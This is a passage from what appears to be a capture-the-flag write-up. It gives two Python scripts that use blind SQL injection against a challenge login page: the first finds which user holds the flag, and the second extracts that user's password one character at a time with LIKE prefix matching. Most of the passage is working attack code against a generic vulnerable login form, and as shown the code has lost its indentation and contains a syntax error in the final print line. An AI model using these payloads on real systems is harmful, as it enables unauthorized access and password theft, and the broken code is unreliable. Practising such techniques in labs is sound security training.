#!/usr/bin/env python3
import requests
import sys
f = open("users").read().split("\n")
while(1):
for user in f:
data = {'username':user,'passwd':"""1' or passwd like 'FLAG{%}'""", 'login':'Login'}
if "Login failed" not in requests.post("http://%s/challenge2.php" % sys.argv[1], data=data).text:
print("[+] USER WITH FLAG = ",user)
break
Well, Guillaume is our target, now we are gonna get its password (the flag):
#!/usr/bin/env python3
import requests
import sys
flag = 'FLAG{'
while(1):
for i in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" :
data = {'username':"Guillaume",'passwd':"""1' or passwd like '"""+flag+i+"""%""",'login':'Login'}
if "Login failed" not in requests.post("http://%s/challenge2.php" % sys.argv[1], data=data).text:
flag+=i
print(flag)
if (len(flag)==37):
print ("[+] FLAG : "flag.upper()+"}")
break
As you can see, I use the sql LIKE statement to detect when the prefix of the flag is OK.
We can retrieve the flag's characters one by one with this technique.